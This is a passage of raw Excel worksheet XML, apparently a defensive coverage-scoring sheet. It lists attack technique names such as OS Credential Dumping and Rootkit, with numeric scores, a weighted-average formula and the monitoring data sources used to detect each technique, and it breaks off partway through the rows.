        <x14:conditionalFormatting xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main">
          <x14:cfRule type="dataBar" id="{2323C704-7490-4BB5-8625-3C13399C11D8}">
            <x14:dataBar minLength="0" maxLength="100" gradient="0">
              <x14:cfvo type="num">
                <xm:f>0</xm:f>
              </x14:cfvo>
              <x14:cfvo type="num">
                <xm:f>5</xm:f>
              </x14:cfvo>
              <x14:negativeFillColor rgb="FFFF0000"/>
              <x14:axisColor rgb="FF000000"/>
            </x14:dataBar>
          </x14:cfRule>
          <xm:sqref>C32:E32</xm:sqref>
        </x14:conditionalFormatting>
        <x14:conditionalFormatting xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main">
          <x14:cfRule type="dataBar" id="{51DC4BD7-7039-43FC-8B2C-E21CA778F180}">
            <x14:dataBar minLength="0" maxLength="100" gradient="0">
              <x14:cfvo type="num">
                <xm:f>0</xm:f>
              </x14:cfvo>
              <x14:cfvo type="num">
                <xm:f>5</xm:f>
              </x14:cfvo>
              <x14:negativeFillColor rgb="FFFF0000"/>
              <x14:axisColor rgb="FF000000"/>
            </x14:dataBar>
          </x14:cfRule>
          <xm:sqref>C92:E92</xm:sqref>
        </x14:conditionalFormatting>
        <x14:conditionalFormatting xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main">
          <x14:cfRule type="dataBar" id="{54D717AA-8818-4B02-8C83-00BEF7294B3A}">
            <x14:dataBar minLength="0" maxLength="100" gradient="0" direction="leftToRight">
              <x14:cfvo type="num">
                <xm:f>0</xm:f>
              </x14:cfvo>
              <x14:cfvo type="num">
                <xm:f>5</xm:f>
              </x14:cfvo>
              <x14:negativeFillColor rgb="FFFF0000"/>
              <x14:axisColor rgb="FF000000"/>
            </x14:dataBar>
          </x14:cfRule>
          <xm:sqref>F92</xm:sqref>
        </x14:conditionalFormatting>
        <x14:conditionalFormatting xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main">
          <x14:cfRule type="dataBar" id="{C9DBA87F-6B7E-4E55-8409-2C566705AEF8}">
            <x14:dataBar minLength="0" maxLength="100" gradient="0">
              <x14:cfvo type="num">
                <xm:f>0</xm:f>
              </x14:cfvo>
              <x14:cfvo type="num">
                <xm:f>5</xm:f>
              </x14:cfvo>
              <x14:negativeFillColor rgb="FFFF0000"/>
              <x14:axisColor rgb="FF000000"/>
            </x14:dataBar>
          </x14:cfRule>
          <xm:sqref>C93:E93</xm:sqref>
        </x14:conditionalFormatting>
        <x14:conditionalFormatting xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main">
          <x14:cfRule type="dataBar" id="{ADA371F9-3533-44E9-8A10-A5BBF314EA61}">
            <x14:dataBar minLength="0" maxLength="100" gradient="0" direction="leftToRight">
              <x14:cfvo type="num">
                <xm:f>0</xm:f>
              </x14:cfvo>
              <x14:cfvo type="num">
                <xm:f>5</xm:f>
              </x14:cfvo>
              <x14:negativeFillColor rgb="FFFF0000"/>
              <x14:axisColor rgb="FF000000"/>
            </x14:dataBar>
          </x14:cfRule>
          <xm:sqref>F93</xm:sqref>
        </x14:conditionalFormatting>
        <x14:conditionalFormatting xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main">
          <x14:cfRule type="dataBar" id="{2ACF10F8-C5C5-4FDC-BEE2-1BDFD1A91B07}">
            <x14:dataBar minLength="0" maxLength="100" gradient="0">
              <x14:cfvo type="num">
                <xm:f>0</xm:f>
              </x14:cfvo>
              <x14:cfvo type="num">
                <xm:f>5</xm:f>
              </x14:cfvo>
              <x14:negativeFillColor rgb="FFFF0000"/>
              <x14:axisColor rgb="FF000000"/>
            </x14:dataBar>
          </x14:cfRule>
          <xm:sqref>C94:E94</xm:sqref>
        </x14:conditionalFormatting>
        <x14:conditionalFormatting xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main">
          <x14:cfRule type="dataBar" id="{E878D11A-B256-4591-9632-B2BB7A46FCBF}">
            <x14:dataBar minLength="0" maxLength="100" gradient="0" direction="leftToRight">
              <x14:cfvo type="num">
                <xm:f>0</xm:f>
              </x14:cfvo>
              <x14:cfvo type="num">
                <xm:f>5</xm:f>
              </x14:cfvo>
              <x14:negativeFillColor rgb="FFFF0000"/>
              <x14:axisColor rgb="FF000000"/>
            </x14:dataBar>
          </x14:cfRule>
          <xm:sqref>F94</xm:sqref>
        </x14:conditionalFormatting>
        <x14:conditionalFormatting xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main">
          <x14:cfRule type="dataBar" id="{FCDC9171-7D8E-4699-A31D-E46438211B49}">
            <x14:dataBar minLength="0" maxLength="100" gradient="0">
              <x14:cfvo type="num">
                <xm:f>0</xm:f>
              </x14:cfvo>
              <x14:cfvo type="num">
                <xm:f>5</xm:f>
              </x14:cfvo>
              <x14:negativeFillColor rgb="FFFF0000"/>
              <x14:axisColor rgb="FF000000"/>
            </x14:dataBar>
          </x14:cfRule>
          <xm:sqref>C95:E95</xm:sqref>
        </x14:conditionalFormatting>
        <x14:conditionalFormatting xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main">
          <x14:cfRule type="dataBar" id="{86B9D43D-787D-4ED5-BB86-43FC1CED62B5}">
            <x14:dataBar minLength="0" maxLength="100" gradient="0" direction="leftToRight">
              <x14:cfvo type="num">
                <xm:f>0</xm:f>
              </x14:cfvo>
              <x14:cfvo type="num">
                <xm:f>5</xm:f>
              </x14:cfvo>
              <x14:negativeFillColor rgb="FFFF0000"/>
              <x14:axisColor rgb="FF000000"/>
            </x14:dataBar>
          </x14:cfRule>
          <xm:sqref>F95</xm:sqref>
        </x14:conditionalFormatting>
        <x14:conditionalFormatting xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main">
          <x14:cfRule type="dataBar" id="{0BABE90C-9E31-42D4-A83F-9FBF987905CE}">
            <x14:dataBar minLength="0" maxLength="100" gradient="0">
              <x14:cfvo type="num">
                <xm:f>0</xm:f>
              </x14:cfvo>
              <x14:cfvo type="num">
                <xm:f>5</xm:f>
              </x14:cfvo>
              <x14:negativeFillColor rgb="FFFF0000"/>
              <x14:axisColor rgb="FF000000"/>
            </x14:dataBar>
          </x14:cfRule>
          <xm:sqref>C96:E96</xm:sqref>
        </x14:conditionalFormatting>
        <x14:conditionalFormatting xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main">
          <x14:cfRule type="dataBar" id="{29AF288C-7497-4E50-A90D-702064551817}">
            <x14:dataBar minLength="0" maxLength="100" gradient="0" direction="leftToRight">
              <x14:cfvo type="num">
                <xm:f>0</xm:f>
              </x14:cfvo>
              <x14:cfvo type="num">
                <xm:f>5</xm:f>
              </x14:cfvo>
              <x14:negativeFillColor rgb="FFFF0000"/>
              <x14:axisColor rgb="FF000000"/>
            </x14:dataBar>
          </x14:cfRule>
          <xm:sqref>F96</xm:sqref>
        </x14:conditionalFormatting>
        <x14:conditionalFormatting xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main">
          <x14:cfRule type="dataBar" id="{05810F08-D696-43C8-8E7F-7AAFD7820A79}">
            <x14:dataBar minLength="0" maxLength="100" gradient="0">
              <x14:cfvo type="num">
                <xm:f>0</xm:f>
              </x14:cfvo>
              <x14:cfvo type="num">
                <xm:f>5</xm:f>
              </x14:cfvo>
              <x14:negativeFillColor rgb="FFFF0000"/>
              <x14:axisColor rgb="FF000000"/>
            </x14:dataBar>
          </x14:cfRule>
          <xm:sqref>C97:E97</xm:sqref>
        </x14:conditionalFormatting>
        <x14:conditionalFormatting xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main">
          <x14:cfRule type="dataBar" id="{1046C76A-5CCE-4BA0-BA72-1E32A5404BE4}">
            <x14:dataBar minLength="0" maxLength="100" gradient="0" direction="leftToRight">
              <x14:cfvo type="num">
                <xm:f>0</xm:f>
              </x14:cfvo>
              <x14:cfvo type="num">
                <xm:f>5</xm:f>
              </x14:cfvo>
              <x14:negativeFillColor rgb="FFFF0000"/>
              <x14:axisColor rgb="FF000000"/>
            </x14:dataBar>
          </x14:cfRule>
          <xm:sqref>F97</xm:sqref>
        </x14:conditionalFormatting>
        <x14:conditionalFormatting xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main">
          <x14:cfRule type="dataBar" id="{9E703173-FD1C-49D1-B1D3-E84ADB379664}">
            <x14:dataBar minLength="0" maxLength="100" gradient="0">
              <x14:cfvo type="num">
                <xm:f>0</xm:f>
              </x14:cfvo>
              <x14:cfvo type="num">
                <xm:f>5</xm:f>
              </x14:cfvo>
              <x14:negativeFillColor rgb="FFFF0000"/>
              <x14:axisColor rgb="FF000000"/>
            </x14:dataBar>
          </x14:cfRule>
          <xm:sqref>C98:E98</xm:sqref>
        </x14:conditionalFormatting>
        <x14:conditionalFormatting xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main">
          <x14:cfRule type="dataBar" id="{11B547AC-954F-4B03-B1C5-4868980407EF}">
            <x14:dataBar minLength="0" maxLength="100" gradient="0" direction="leftToRight">
              <x14:cfvo type="num">
                <xm:f>0</xm:f>
              </x14:cfvo>
              <x14:cfvo type="num">
                <xm:f>5</xm:f>
              </x14:cfvo>
              <x14:negativeFillColor rgb="FFFF0000"/>
              <x14:axisColor rgb="FF000000"/>
            </x14:dataBar>
          </x14:cfRule>
          <xm:sqref>F98</xm:sqref>
        </x14:conditionalFormatting>
        <x14:conditionalFormatting xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main">
          <x14:cfRule type="dataBar" id="{D1CF6177-62EF-4388-9E1E-F665E2625163}">
            <x14:dataBar minLength="0" maxLength="100" gradient="0">
              <x14:cfvo type="num">
                <xm:f>0</xm:f>
              </x14:cfvo>
              <x14:cfvo type="num">
                <xm:f>5</xm:f>
              </x14:cfvo>
              <x14:negativeFillColor rgb="FFFF0000"/>
              <x14:axisColor rgb="FF000000"/>
            </x14:dataBar>
          </x14:cfRule>
          <xm:sqref>C99:E99</xm:sqref>
        </x14:conditionalFormatting>
        <x14:conditionalFormatting xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main">
          <x14:cfRule type="dataBar" id="{43C68606-AF7C-4819-8129-31FA2073F874}">
            <x14:dataBar minLength="0" maxLength="100" gradient="0" direction="leftToRight">
              <x14:cfvo type="num">
                <xm:f>0</xm:f>
              </x14:cfvo>
              <x14:cfvo type="num">
                <xm:f>5</xm:f>
              </x14:cfvo>
              <x14:negativeFillColor rgb="FFFF0000"/>
              <x14:axisColor rgb="FF000000"/>
            </x14:dataBar>
          </x14:cfRule>
          <xm:sqref>F99</xm:sqref>
        </x14:conditionalFormatting>
        <x14:conditionalFormatting xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main">
          <x14:cfRule type="dataBar" id="{5EECF62D-61BE-4B44-9F5D-351D2652E97E}">
            <x14:dataBar minLength="0" maxLength="100" gradient="0">
              <x14:cfvo type="num">
                <xm:f>0</xm:f>
              </x14:cfvo>
              <x14:cfvo type="num">
                <xm:f>5</xm:f>
              </x14:cfvo>
              <x14:negativeFillColor rgb="FFFF0000"/>
              <x14:axisColor rgb="FF000000"/>
            </x14:dataBar>
          </x14:cfRule>
          <xm:sqref>C100:E100</xm:sqref>
        </x14:conditionalFormatting>
        <x14:conditionalFormatting xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main">
          <x14:cfRule type="dataBar" id="{71C4A432-AF4B-476D-BD50-ADF6A1555951}">
            <x14:dataBar minLength="0" maxLength="100" gradient="0" direction="leftToRight">
              <x14:cfvo type="num">
                <xm:f>0</xm:f>
              </x14:cfvo>
              <x14:cfvo type="num">
                <xm:f>5</xm:f>
              </x14:cfvo>
              <x14:negativeFillColor rgb="FFFF0000"/>
              <x14:axisColor rgb="FF000000"/>
            </x14:dataBar>
          </x14:cfRule>
          <xm:sqref>F100</xm:sqref>
        </x14:conditionalFormatting>
        <x14:conditionalFormatting xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main">
          <x14:cfRule type="dataBar" id="{1ABB6B78-DF6F-4CFE-867F-FBE36CDAA92A}">
            <x14:dataBar minLength="0" maxLength="100" gradient="0">
              <x14:cfvo type="num">
                <xm:f>0</xm:f>
              </x14:cfvo>
              <x14:cfvo type="num">
                <xm:f>5</xm:f>
              </x14:cfvo>
              <x14:negativeFillColor rgb="FFFF0000"/>
              <x14:axisColor rgb="FF000000"/>
            </x14:dataBar>
          </x14:cfRule>
          <xm:sqref>C101:E101</xm:sqref>
        </x14:conditionalFormatting>
        <x14:conditionalFormatting xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main">
          <x14:cfRule type="dataBar" id="{9DDEDC39-4DC5-4B93-838C-97AA16A4FE71}">
            <x14:dataBar minLength="0" maxLength="100" gradient="0" direction="leftToRight">
              <x14:cfvo type="num">
                <xm:f>0</xm:f>
              </x14:cfvo>
              <x14:cfvo type="num">
                <xm:f>5</xm:f>
              </x14:cfvo>
              <x14:negativeFillColor rgb="FFFF0000"/>
              <x14:axisColor rgb="FF000000"/>
            </x14:dataBar>
          </x14:cfRule>
          <xm:sqref>F101</xm:sqref>
        </x14:conditionalFormatting>
        <x14:conditionalFormatting xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main">
          <x14:cfRule type="dataBar" id="{CDA1D47B-B38D-4A16-9829-B6D0422F3EC5}">
            <x14:dataBar minLength="0" maxLength="100" gradient="0">
              <x14:cfvo type="num">
                <xm:f>0</xm:f>
              </x14:cfvo>
              <x14:cfvo type="num">
                <xm:f>5</xm:f>
              </x14:cfvo>
              <x14:negativeFillColor rgb="FFFF0000"/>
              <x14:axisColor rgb="FF000000"/>
            </x14:dataBar>
          </x14:cfRule>
          <xm:sqref>C102:E102</xm:sqref>
        </x14:conditionalFormatting>
        <x14:conditionalFormatting xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main">
          <x14:cfRule type="dataBar" id="{7AE861F1-CC0A-4C4C-A23B-12DDE14AC3C4}">
            <x14:dataBar minLength="0" maxLength="100" gradient="0" direction="leftToRight">
              <x14:cfvo type="num">
                <xm:f>0</xm:f>
              </x14:cfvo>
              <x14:cfvo type="num">
                <xm:f>5</xm:f>
              </x14:cfvo>
              <x14:negativeFillColor rgb="FFFF0000"/>
              <x14:axisColor rgb="FF000000"/>
            </x14:dataBar>
          </x14:cfRule>
          <xm:sqref>F102</xm:sqref>
        </x14:conditionalFormatting>
        <x14:conditionalFormatting xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main">
          <x14:cfRule type="dataBar" id="{C0564927-435D-4431-84E3-EE29454E3E39}">
            <x14:dataBar minLength="0" maxLength="100" gradient="0">
              <x14:cfvo type="num">
                <xm:f>0</xm:f>
              </x14:cfvo>
              <x14:cfvo type="num">
                <xm:f>5</xm:f>
              </x14:cfvo>
              <x14:negativeFillColor rgb="FFFF0000"/>
              <x14:axisColor rgb="FF000000"/>
            </x14:dataBar>
          </x14:cfRule>
          <xm:sqref>C103:E115</xm:sqref>
        </x14:conditionalFormatting>
        <x14:conditionalFormatting xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main">
          <x14:cfRule type="dataBar" id="{C0337D63-46A3-4DD3-8CD2-36FDFD19FCC0}">
            <x14:dataBar minLength="0" maxLength="100" gradient="0" direction="leftToRight">
              <x14:cfvo type="num">
                <xm:f>0</xm:f>
              </x14:cfvo>
              <x14:cfvo type="num">
                <xm:f>5</xm:f>
              </x14:cfvo>
              <x14:negativeFillColor rgb="FFFF0000"/>
              <x14:axisColor rgb="FF000000"/>
            </x14:dataBar>
          </x14:cfRule>
          <xm:sqref>F103:F115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A1C3-EA6F-4B4B-BBD4-B62E82A3A657}">
  <dimension ref="A1:AC431"/>
  <sheetViews>
    <sheetView zoomScale="85" zoomScaleNormal="85" workbookViewId="0">
      <pane ySplit="1" topLeftCell="A2" activePane="bottomLeft" state="frozen"/>
      <selection pane="bottomLeft" activeCell="I268" sqref="F268:I268"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultColWidth="8.83203125" defaultRowHeight="15" x14ac:dyDescent="0.2"/>
  <cols>
    <col min="1" max="1" width="16.1640625" customWidth="1"/>
    <col min="2" max="4" width="57.1640625" customWidth="1"/>
    <col min="5" max="5" width="20.6640625" customWidth="1"/>
    <col min="6" max="8" width="20.6640625" style="2" customWidth="1"/>
    <col min="9" max="9" width="32.5" style="1" customWidth="1"/>
    <col min="10" max="10" width="9.1640625" style="3" customWidth="1"/>
    <col min="11" max="11" width="77.83203125" style="3" customWidth="1"/>
    <col min="12" max="29" width="9.1640625" style="3" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:11" ht="33" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A1" s="42" t="s">
        <v>37</v>
      </c>
      <c r="B1" s="42" t="s">
        <v>406</v>
      </c>
      <c r="C1" s="28" t="s">
        <v>2885</v>
      </c>
      <c r="D1" s="28" t="s">
        <v>2886</v>
      </c>
      <c r="E1" s="28" t="s">
        <v>407</v>
      </c>
      <c r="F1" s="44" t="s">
        <v>2</v>
      </c>
      <c r="G1" s="44" t="s">
        <v>2887</v>
      </c>
      <c r="H1" s="44" t="s">
        <v>4</v>
      </c>
      <c r="I1" s="31" t="s">
        <v>5</v>
      </c>
      <c r="J1" s="42"/>
      <c r="K1" s="42" t="s">
        <v>2888</v>
      </c>
    </row>
    <row r="2" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A2" s="43" t="s">
        <v>44</v>
      </c>
      <c r="B2" s="41" t="str">
        <f>LOOKUP(A2,'REF-DataSources'!A:B)</f>
        <v>Data Obfuscation</v>
      </c>
      <c r="C2" s="45" t="s">
        <v>2889</v>
      </c>
      <c r="D2" s="45" t="s">
        <v>2890</v>
      </c>
      <c r="E2" s="45"/>
      <c r="F2" s="14">
        <v>4</v>
      </c>
      <c r="G2" s="14">
        <v>3</v>
      </c>
      <c r="H2" s="14">
        <v>4</v>
      </c>
      <c r="I2" s="32">
        <f t="shared" ref="I2:I6" si="0">((F2*2)+G2+(H2*2))/5</f>
        <v>3.8</v>
      </c>
      <c r="K2" s="46" t="str">
        <f>LOOKUP(A2,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Process use of network,Process monitoring,Network protocol analysis</v>
      </c>
    </row>
    <row r="3" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A3" s="43" t="s">
        <v>46</v>
      </c>
      <c r="B3" s="41" t="str">
        <f>LOOKUP(A3,'REF-DataSources'!A:B)</f>
        <v>Protocol Impersonation</v>
      </c>
      <c r="C3" s="45" t="s">
        <v>2891</v>
      </c>
      <c r="D3" s="45" t="s">
        <v>2892</v>
      </c>
      <c r="E3" s="45"/>
      <c r="F3" s="14">
        <v>2</v>
      </c>
      <c r="G3" s="14">
        <v>4</v>
      </c>
      <c r="H3" s="14">
        <v>2</v>
      </c>
      <c r="I3" s="32">
        <f t="shared" si="0"/>
        <v>2.4</v>
      </c>
      <c r="K3" s="46" t="str">
        <f>LOOKUP(A3,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Process use of network,Process monitoring,Network protocol analysis</v>
      </c>
    </row>
    <row r="4" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A4" s="43" t="s">
        <v>48</v>
      </c>
      <c r="B4" s="41" t="str">
        <f>LOOKUP(A4,'REF-DataSources'!A:B)</f>
        <v>OS Credential Dumping</v>
      </c>
      <c r="C4" s="45" t="s">
        <v>2893</v>
      </c>
      <c r="D4" s="45" t="s">
        <v>574</v>
      </c>
      <c r="E4" s="45"/>
      <c r="F4" s="14">
        <v>4</v>
      </c>
      <c r="G4" s="14">
        <v>3</v>
      </c>
      <c r="H4" s="14">
        <v>4</v>
      </c>
      <c r="I4" s="32">
        <f t="shared" si="0"/>
        <v>3.8</v>
      </c>
      <c r="K4" s="46" t="str">
        <f>LOOKUP(A4,'REF-DataSources'!A:C)</f>
        <v>API monitoring,Process monitoring,PowerShell logs,Process command-line parameters</v>
      </c>
    </row>
    <row r="5" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A5" s="43" t="s">
        <v>49</v>
      </c>
      <c r="B5" s="41" t="str">
        <f>LOOKUP(A5,'REF-DataSources'!A:B)</f>
        <v>/etc/passwd and /etc/shadow</v>
      </c>
      <c r="C5" s="45"/>
      <c r="D5" s="45"/>
      <c r="E5" s="45"/>
      <c r="F5" s="14">
        <v>0</v>
      </c>
      <c r="G5" s="14">
        <v>0</v>
      </c>
      <c r="H5" s="14">
        <v>0</v>
      </c>
      <c r="I5" s="32">
        <f>((F5*2)+G5+(H5*2))/5</f>
        <v>0</v>
      </c>
      <c r="K5" s="46" t="str">
        <f>LOOKUP(A5,'REF-DataSources'!A:C)</f>
        <v/>
      </c>
    </row>
    <row r="6" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A6" s="43" t="s">
        <v>51</v>
      </c>
      <c r="B6" s="41" t="str">
        <f>LOOKUP(A6,'REF-DataSources'!A:B)</f>
        <v>Data from Local System</v>
      </c>
      <c r="C6" s="45"/>
      <c r="D6" s="45"/>
      <c r="E6" s="45"/>
      <c r="F6" s="14">
        <v>0</v>
      </c>
      <c r="G6" s="14">
        <v>0</v>
      </c>
      <c r="H6" s="14">
        <v>0</v>
      </c>
      <c r="I6" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="K6" s="46" t="str">
        <f>LOOKUP(A6,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="7" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A7" s="43" t="s">
        <v>53</v>
      </c>
      <c r="B7" s="41" t="str">
        <f>LOOKUP(A7,'REF-DataSources'!A:B)</f>
        <v>Direct Volume Access</v>
      </c>
      <c r="C7" s="45"/>
      <c r="D7" s="45"/>
      <c r="E7" s="45"/>
      <c r="F7" s="14">
        <v>0</v>
      </c>
      <c r="G7" s="14">
        <v>0</v>
      </c>
      <c r="H7" s="14">
        <v>0</v>
      </c>
      <c r="I7" s="32">
        <f>((F7*2)+G7+(H7*2))/5</f>
        <v>0</v>
      </c>
      <c r="K7" s="46" t="str">
        <f>LOOKUP(A7,'REF-DataSources'!A:C)</f>
        <v>API monitoring</v>
      </c>
    </row>
    <row r="8" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A8" s="43" t="s">
        <v>54</v>
      </c>
      <c r="B8" s="41" t="str">
        <f>LOOKUP(A8,'REF-DataSources'!A:B)</f>
        <v>System Service Discovery</v>
      </c>
      <c r="C8" s="45"/>
      <c r="D8" s="45"/>
      <c r="E8" s="45"/>
      <c r="F8" s="14">
        <v>0</v>
      </c>
      <c r="G8" s="14">
        <v>0</v>
      </c>
      <c r="H8" s="14">
        <v>0</v>
      </c>
      <c r="I8" s="32">
        <f t="shared" ref="I8:I51" si="1">((F8*2)+G8+(H8*2))/5</f>
        <v>0</v>
      </c>
      <c r="K8" s="46" t="str">
        <f>LOOKUP(A8,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="9" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A9" s="43" t="s">
        <v>56</v>
      </c>
      <c r="B9" s="41" t="str">
        <f>LOOKUP(A9,'REF-DataSources'!A:B)</f>
        <v>Fallback Channels</v>
      </c>
      <c r="C9" s="45"/>
      <c r="D9" s="45"/>
      <c r="E9" s="45"/>
      <c r="F9" s="14">
        <v>0</v>
      </c>
      <c r="G9" s="14">
        <v>0</v>
      </c>
      <c r="H9" s="14">
        <v>0</v>
      </c>
      <c r="I9" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K9" s="46" t="str">
        <f>LOOKUP(A9,'REF-DataSources'!A:C)</f>
        <v>Malware reverse engineering,Netflow/Enclave netflow,Packet capture,Process monitoring,Process use of network</v>
      </c>
    </row>
    <row r="10" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A10" s="43" t="s">
        <v>58</v>
      </c>
      <c r="B10" s="41" t="str">
        <f>LOOKUP(A10,'REF-DataSources'!A:B)</f>
        <v>Fallback Channels</v>
      </c>
      <c r="C10" s="45"/>
      <c r="D10" s="45"/>
      <c r="E10" s="45"/>
      <c r="F10" s="14">
        <v>0</v>
      </c>
      <c r="G10" s="14">
        <v>0</v>
      </c>
      <c r="H10" s="14">
        <v>0</v>
      </c>
      <c r="I10" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K10" s="46" t="str">
        <f>LOOKUP(A10,'REF-DataSources'!A:C)</f>
        <v>Malware reverse engineering,Netflow/Enclave netflow,Packet capture,Process monitoring,Process use of network</v>
      </c>
    </row>
    <row r="11" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A11" s="43" t="s">
        <v>60</v>
      </c>
      <c r="B11" s="41" t="str">
        <f>LOOKUP(A11,'REF-DataSources'!A:B)</f>
        <v>Application Window Discovery</v>
      </c>
      <c r="C11" s="45"/>
      <c r="D11" s="45"/>
      <c r="E11" s="45"/>
      <c r="F11" s="14">
        <v>0</v>
      </c>
      <c r="G11" s="14">
        <v>0</v>
      </c>
      <c r="H11" s="14">
        <v>0</v>
      </c>
      <c r="I11" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K11" s="46" t="str">
        <f>LOOKUP(A11,'REF-DataSources'!A:C)</f>
        <v>API monitoring,Process monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="12" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A12" s="43" t="s">
        <v>62</v>
      </c>
      <c r="B12" s="41" t="str">
        <f>LOOKUP(A12,'REF-DataSources'!A:B)</f>
        <v>Exfiltration Over Other Network Medium</v>
      </c>
      <c r="C12" s="45"/>
      <c r="D12" s="45"/>
      <c r="E12" s="45"/>
      <c r="F12" s="14">
        <v>0</v>
      </c>
      <c r="G12" s="14">
        <v>0</v>
      </c>
      <c r="H12" s="14">
        <v>0</v>
      </c>
      <c r="I12" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K12" s="46" t="str">
        <f>LOOKUP(A12,'REF-DataSources'!A:C)</f>
        <v>User interface,Process monitoring</v>
      </c>
    </row>
    <row r="13" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A13" s="43" t="s">
        <v>64</v>
      </c>
      <c r="B13" s="41" t="str">
        <f>LOOKUP(A13,'REF-DataSources'!A:B)</f>
        <v>Query Registry</v>
      </c>
      <c r="C13" s="45"/>
      <c r="D13" s="45"/>
      <c r="E13" s="45"/>
      <c r="F13" s="14">
        <v>0</v>
      </c>
      <c r="G13" s="14">
        <v>0</v>
      </c>
      <c r="H13" s="14">
        <v>0</v>
      </c>
      <c r="I13" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K13" s="46" t="str">
        <f>LOOKUP(A13,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,Process monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="14" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A14" s="43" t="s">
        <v>66</v>
      </c>
      <c r="B14" s="41" t="str">
        <f>LOOKUP(A14,'REF-DataSources'!A:B)</f>
        <v>Query Registry</v>
      </c>
      <c r="C14" s="45"/>
      <c r="D14" s="45"/>
      <c r="E14" s="45"/>
      <c r="F14" s="14">
        <v>0</v>
      </c>
      <c r="G14" s="14">
        <v>0</v>
      </c>
      <c r="H14" s="14">
        <v>0</v>
      </c>
      <c r="I14" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K14" s="46" t="str">
        <f>LOOKUP(A14,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,Process monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="15" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A15" s="43" t="s">
        <v>68</v>
      </c>
      <c r="B15" s="41" t="str">
        <f>LOOKUP(A15,'REF-DataSources'!A:B)</f>
        <v>Rootkit</v>
      </c>
      <c r="C15" s="45"/>
      <c r="D15" s="45"/>
      <c r="E15" s="45"/>
      <c r="F15" s="14">
        <v>0</v>
      </c>
      <c r="G15" s="14">
        <v>0</v>
      </c>
      <c r="H15" s="14">
        <v>0</v>
      </c>
      <c r="I15" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K15" s="46" t="str">
        <f>LOOKUP(A15,'REF-DataSources'!A:C)</f>
        <v>BIOS,MBR,System calls</v>
      </c>
    </row>
    <row r="16" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A16" s="43" t="s">
        <v>70</v>
      </c>
      <c r="B16" s="41" t="str">
        <f>LOOKUP(A16,'REF-DataSources'!A:B)</f>
        <v>Rootkit</v>
      </c>
      <c r="C16" s="45"/>
      <c r="D16" s="45"/>
      <c r="E16" s="45"/>
      <c r="F16" s="14">
        <v>0</v>
      </c>
      <c r="G16" s="14">
        <v>0</v>
      </c>
      <c r="H16" s="14">
        <v>0</v>
      </c>
      <c r="I16" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K16" s="46" t="str">
        <f>LOOKUP(A16,'REF-DataSources'!A:C)</f>
        <v>BIOS,MBR,System calls</v>
      </c>
    </row>
    <row r="17" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A17" s="43" t="s">
        <v>72</v>
      </c>
      <c r="B17" s="41" t="str">
        <f>LOOKUP(A17,'REF-DataSources'!A:B)</f>
        <v>System Network Configuration Discovery</v>
      </c>
      <c r="C17" s="45"/>
      <c r="D17" s="45"/>
      <c r="E17" s="45"/>
      <c r="F17" s="14">
        <v>0</v>
      </c>
      <c r="G17" s="14">
        <v>0</v>
      </c>
      <c r="H17" s="14">
        <v>0</v>
      </c>
      <c r="I17" s="32">
        <f>((F17*2)+G17+(H17*2))/5</f>
        <v>0</v>
      </c>
      <c r="K17" s="46" t="str">
